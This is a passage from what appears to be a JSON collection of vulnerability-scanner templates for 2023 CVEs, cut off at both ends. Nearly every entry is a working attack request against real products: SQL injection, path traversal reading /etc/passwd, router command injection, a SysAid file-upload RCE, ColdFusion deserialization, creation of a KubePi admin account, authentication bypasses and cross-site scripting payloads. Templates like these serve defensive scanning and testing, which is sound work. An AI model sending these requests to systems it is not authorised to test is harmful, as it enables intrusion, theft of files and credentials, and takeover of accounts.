/CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>\n"],"matchers-condition":"or","matchers":[{"type":"dsl","name":"windows","dsl":["status_code_1 == 500 && status_code_2 == 404","contains(body_1, \"coldfusion.runtime\")"],"condition":"and"},{"type":"dsl","name":"linux","dsl":["status_code_3 == 500 && status_code_4 == 404","contains(body_3, \"coldfusion.runtime\")"],"condition":"and"}]}]},{"id":"CVE-2023-3845","info":{"name":"MooDating 1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ef26v4?mode=model"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"><img src=a onerror=alert(document.domain)>\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-29439","info":{"name":"FooGallery plugin <= 2.2.35 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/post-new.php?post_type=foogallery&post=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["data-gallery_id=\"\\\"><script>alert(document.domain)</script>\"","foogallery-image-edit-modal"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6038","info":{"name":"H2O ImportFiles - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /3/ImportFiles?path=%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\n","POST /3/ParseSetup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsource_frames=%5B%22nfs%3A%2F%2Fetc%2Fpasswd%22%5D\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'ImportFilesV3')","regex('root:.*:0:0:', body_2)","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-4568","info":{"name":"PaperCut NG Unauthenticated XMLRPC Functionality","severity":"medium"},"requests":[{"raw":["POST /rpc/clients/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nContent-Type:text/xml\n\n<?xml version=\"1.0\"?><methodCall><methodName>client.getGlobalConfig</methodName><params><param><value><string>str1</string></value></param><param><value><string>str2</string></value></param></params></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["conf.ssl-port","conf.auth-ttl-default"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29922","info":{"name":"PowerJob V4.3.1 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["POST /user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"username\":\"{{str}}\",\"phone\":\"{{str}}\",\"email\":\"{{str}}\",\"webHook\":\"{{str}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"data\":null"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27639","info":{"name":"PrestaShop TshirteCommerce - Directory Traversal","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/tshirtecommerce/ajax.php?type=svg"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php","matchers-condition":"and","matchers":[{"type":"word","words":["SqlFormatter Examples","SqlFormatter","<?php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-41266","info":{"name":"Qlik Sense Enterprise - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resources/qmc/fonts/../../../qrs/ReloadTask?xrfkey=1333333333333337&filter=.ttf"],"headers":{"Cookie":"X-Qlik-Session=13333333-3333-3333-3333-333333333337","X-Qlik-Xrfkey":"1333333333333337"},"matchers":[{"type":"dsl","dsl":["status_code == 400","contains(to_lower(set_cookie), 'x-qlik-session')","contains(body, 'The comparison expression does not consist of three elements')"],"condition":"and"}]}]},{"id":"CVE-2023-1454","info":{"name":"Jeecg-boot 3.5.0 qurestSql - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/qurestSql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"apiSelectId\":\"1316997232402231298\",\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQLException","XPATH syntax error:"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["XPATH syntax error: '([a-z_@%]+)'","XPATH syntax error: '([a-z- @%]+)'","XPATH syntax error: '([a-z@%0-9.]+)'"],"part":"body"}]}]},{"id":"CVE-2023-22463","info":{"name":"KubePi JwtSigKey - Admin Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /kubepi/api/v1/users HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n\n{\n  \"authenticate\": {\n       \"password\": \"{{password}}\"\n  },\n  \"email\": \"{{email}}\",\n  \"isAdmin\": true,\n  \"mfa\": {\n          \"enable\": false\n   },\n  \"name\": \"{{name}}\",\n  \"nickName\": \"{{nickname}}\",\n  \"roles\": [\n  ]\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"password\":","\"isAdmin\":","\"createAt\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2224","info":{"name":"Seo By 10Web < 1.2.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wdseo_sitemap HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=wdseo_sitemap&id_message=2 HTTP/1.1\nHost: {{Hostname}}\n\ntask=save&wd_settings%5Bsitemap%5D=1&wd_settings%5Bbing_verification%5D=&wd_settings%5Byandex_verification%5D=&wd_settings%5Bnotify_google%5D=0&wd_settings%5Bnotify_bing%5D=0&wd_settings%5Badditional_pages%5D%5B%5D=&wd_settings%5Badditional_pages%5D%5Bpage_url%5D%5B%5D=%22%3E%3Caudio+src%3Dx+onerror%3Dconfirm%28document.domain%29%3E&wd_settings%5Badditional_pages%5D%5Bpriority%5D%5B%5D=0&wd_settings%5Badditional_pages%5D%5Bfrequency%5D%5B%5D=always&wd_settings%5Badditional_pages%5D%5Blast_changed%5D%5B%5D=&wd_settings%5Bexclude_post_types%5D%5B%5D=&wd_settings%5Bexclude_taxonomies%5D%5B%5D=&wd_settings%5Bexclude_archives%5D%5B%5D=&wd_settings%5Bexclude_posts%5D=&wd_settings%5Bsitemap_image%5D=0&wd_settings%5Bsitemap_video%5D=0&wd_settings%5Bsitemap_stylesheet%5D=1&wd_settings%5Blimit%5D=1000&wd_settings%5Bautoupdate_sitemap%5D=0&nonce_wdseo={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwdseo_sitemap%26id_message%3D1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["value=\"\"><audio src=x onerror=confirm(document.domain)>\""]},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","part":"header_3","status":[200]}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["name=\"nonce_wdseo\" value=\"([a-z0-9]+)\" \\/>"],"internal":true}]}]},{"id":"CVE-2023-6567","info":{"name":"LearnPress <= 4.2.5.7 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 20s\nGET /wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains_all(header, \"lp_session_guest=\", \"application/json\")","contains_all(body, \"status\\\":\\\"success\", \"No courses were found\")"],"condition":"and"}]}]},{"id":"CVE-2023-30013","info":{"name":"TOTOLink - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/cstecgi.cgi HTTP/1.1\nHost: {{Hostname}}\n\n{\"command\":\"127.0.0.1; ls>../{{randstr}};#\",\"num\":\"230\",\"topicurl\":\"setTracerouteCfg\"}\n","GET /{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["lan_ip","reserv"],"condition":"and"},{"type":"word","part":"body_2","words":[".sh",".cgi"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-43374","info":{"name":"Hoteldruid v3.0.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /hoteldruid/inizio.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","part":"body","words":["HotelDruid</a>"],"internal":true}]},{"raw":["@timeout: 20s\nPOST /hoteldruid/personalizza.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naggiorna_qualcosa=SI&anno=2023&attiva_phpr_log=Enable&id_sessione=1&id_utente_log=0'%2b(SELECT%207151%20FROM%20(SELECT(SLEEP(5)))EAXh)%2b'&id_utente_mod=1\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(body, \"HotelDruid:\")"],"condition":"and"}]}]},{"id":"CVE-2023-6023","info":{"name":"VertaAI ModelDB - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/artifact/getArtifact?artifact_path=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream","filename="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-47246","info":{"name":"SysAid Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /userentry?accountId=/../../../tomcat/webapps/{{directory}}/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{ hex_decode('789c0bf06666e16200819c8abcf02241510f4e201b84851864189cc35c758d0c8c8c754dcc8d4cccf44a2a4a42433819981fdb05a79e63f34b2dade0666064f9cac8c0c0023201a83a3ec43538842bc09b91498e1997b1126071a026862d8d506d1896b0422c41b320c09b950da2979121024887824d02000d3f1fcb') }}\n","@timeout: 15\nGET /{{directory}}/CVE-2023-47246.txt?{{wait_for(9)}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,'CVE_TEST') && status_code_1==200 && status_code_2==200"]}]}]},{"id":"CVE-2023-2982","info":{"name":"Miniorange Social Login and Register <= 7.6.3 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption=moopenid&email=uzmpvjPBmwEO3tFXq0vlJg%3D%3D&appName=rlHeqZw2vrPzOiWWfCParA%3D%3D\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"set_cookie","words":["wordpress_sec_","wordpress_logged_in_"],"condition":"or"},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-47643","info":{"name":"SuiteCRM Unauthenticated Graphql Introspection","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-XSRF-TOKEN: {{csrftoken}}\n\n{\"query\":\"query IntrospectionQuery {\\r\\n      __schema {\\r\\n        \\r\\n        queryType { name }\\r\\n        mutationType { name }\\r\\n        subscriptionType { name }\\r\\n        types {\\r\\n          ...FullType\\r\\n        }\\r\\n        directives {\\r\\n          name\\r\\n          description\\r\\n          \\r\\n          locations\\r\\n          args {\\r\\n            ...InputValue\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    }\\r\\n\\r\\n    fragment FullType on __Type {\\r\\n      kind\\r\\n      name\\r\\n      description\\r\\n      \\r\\n      fields(includeDeprecated: true) {\\r\\n        name\\r\\n        description\\r\\n        args {\\r\\n          ...InputValue\\r\\n        }\\r\\n        type {\\r\\n          ...TypeRef\\r\\n        }\\r\\n        isDeprecated\\r\\n        deprecationReason\\r\\n      }\\r\\n      inputFields {\\r\\n        ...InputValue\\r\\n      }\\r\\n      interfaces {\\r\\n        ...TypeRef\\r\\n      }\\r\\n      enumValues(includeDeprecated: true) {\\r\\n        name\\r\\n        description\\r\\n        isDeprecated\\r\\n        deprecationReason\\r\\n      }\\r\\n      possibleTypes {\\r\\n        ...TypeRef\\r\\n      }\\r\\n    }\\r\\n\\r\\n    fragment InputValue on __InputValue {\\r\\n      name\\r\\n      description\\r\\n      type { ...TypeRef }\\r\\n      defaultValue\\r\\n      \\r\\n      \\r\\n    }\\r\\n\\r\\n    fragment TypeRef on __Type {\\r\\n      kind\\r\\n      name\\r\\n      ofType {\\r\\n        kind\\r\\n        name\\r\\n        ofType {\\r\\n          kind\\r\\n          name\\r\\n          ofType {\\r\\n            kind\\r\\n            name\\r\\n            ofType {\\r\\n              kind\\r\\n              name\\r\\n              ofType {\\r\\n                kind\\r\\n                name\\r\\n                ofType {\\r\\n                  kind\\r\\n                  name\\r\\n                  ofType {\\r\\n                    kind\\r\\n                    name\\r\\n                  }\\r\\n                }\\r\\n              }\\r\\n            }\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    }\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["userHash","authenticateId","systemGeneratedPassword"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrftoken","group":1,"part":"header","regex":["XSRF-TOKEN=([^;]+)"],"internal":true}]}]},{"id":"CVE-2023-5375","info":{"name":"Mosparo < 1.0.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/project/switch/1?targetPath=http://oast.pro"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"]}]}]},{"id":"CVE-2023-36144","info":{"name":"Intelbras Switch - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/exportCfgwithpasswd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["System Description","System Version","System Name"],"condition":"and"},{"type":"word","part":"header","words":["attachment;filename="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39700","info":{"name":"IceWarp Mail Server v10.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /webmail/?color=%22%3E%3Cimg%20src=x%20onerror=confirm(document.cookie)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"><img src=x onerror=confirm(document.cookie)>\") && contains(body, \"IceWarp\")"],"condition":"and"}]}]},{"id":"CVE-2023-38203","info":{"name":"Adobe ColdFusion - Deserialization of Untrusted Data","severity":"critical"},"requests":[{"raw":["POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(body, \"ColdFusion documentation\")"],"condition":"and"}]}]},{"id":"CVE-2023-1317","info":{"name":"osTicket < v1.16.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /scp/login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"osticket\")"],"internal":true}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1\n","GET /scp/ajax.php/orgs/search?q=osTicket%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"<img src=a onerror=alert(document.domain)>\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-22893","info":{"name":"Strapi Versions <=4.5.6 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /api/auth/cognito/callback?access_token={{to_lower(rand_text_alpha(8))}}&id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.{{base64(payload)}}. HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"provider\":","\"confirmed\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"json","part":"body","name":"token","json":[".jwt"]}]}]},{"id":"CVE-2023-2825","info":{"name":"GitLab 16.0.0 - Path Traversal","severity":"high"},"requests":[{"raw":["GET /users/sign_in HTTP/1.1\nHost: {{Hostname}}\n","POST /users/sign_in HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\nuser%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\ngroup%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","@timeout: 15s\nPOST /projects HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nproject%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}\n","POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nX-CSRF-Token: {{x-csrf-token}}\nContent-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6\n\n--0ce2a9fbe06b6da89c138a35a1765ed6\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}\"\n\n{{randstr}}\n--0ce2a9fbe06b6da89c138a35a1765ed6--\n","GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["726f6f743a78"],"encoding":"hex"},{"type":"word","part":"header","words":["application/octet-stream","etc%2Fpasswd"],"condition":"and"}],"extractors":[{"type":"regex","name":"token_1","group":1,"regex":["name=\"authenticity_token\" value=\"([A-Za-z0-9_-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"token_2","group":1,"regex":["name=\"csrf\\-token\" content=\"([A-Z_0-9a-z-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"parent_id","group":1,"regex":["href=\"\\/groups\\/new\\?parent_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"namespace_id","group":1,"regex":["ref=\"\\/projects\\/new\\?namespace_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"x-csrf-token","group":1,"regex":["const headers = \\{\"X\\-CSRF\\-Token\":\"([a-zA-Z-0-9_]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"upload-hash","group":1,"regex":["\"url\":\"\\/uploads\\/([0-9a-z]+)\\/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-6977","info":{"name":"Mlflow <2.8.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"//proc/self/root\"}\n","GET /model-versions/get-artifact?name={{randstr}}&path=etc%2Fpasswd&version=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"word","part":"header_3","words":["filename=passwd","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6553","info":{"name":"Worpress Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/backup-backup/readme.txt"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"Backup Migration\")"],"condition":"and"}]},{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/backup-backup/includes/backup-heart.php"],"headers":{"Content-Dir":"{{rand_text_alpha(10)}}"},"matchers":[{"type":"dsl","dsl":["len(body) == 0","status_code == 200","!contains(body, \"Incorrect parameters\")"],"condition":"and"}]}]},{"id":"CVE-2023-50720","info":{"name":"XWiki < 4.10.15 - Email Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale=&text=objcontent%3Aemail*","{{BaseURL}}/xwiki/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale=&text=objcontent%3Aemail*"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["email</span> :","XWiki.XWikiUsers[0]","email_checked</span>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0514","info":{"name":"Membership Database <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"Member Database\")"],"condition":"and"}]}]},{"id":"CVE-2023-50968","info":{"name":"Apache OFBiz < 18.12.11 - Server Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /partymgr/control/{{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{parameter}}={\"http://{{interactsh-url}}/api\":\"{{str}}\"}\n"],"payloads":{"path":["getJSONuiLabel","getJSONuiLabelArray"],"parameter":["requiredLabel","requiredLabels"]},"attack":"clusterbomb","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2023-2356","info":{"name":"Mlflow <2.3.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\"}\n","POST /api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\", \"source\": \"file://{{Hostname}}/../../../../../../../\"}\n","GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-4174","info":{"name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/index?q=\"><img+src=a+onerror=alert(document.domain)>ridxm","{{BaseURL}}/stores\"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent","{{BaseURL}}/user_info\"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends","{{BaseURL}}/faqs\"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search=\"><img+src=a+onerror=alert(document.domain)>ridxm","{{BaseURL}}/classifieds\"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>ridxm","mooSocial"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2023-35885","info":{"name":"Cloudpanel 2 < 2.3.1 - Remote Code 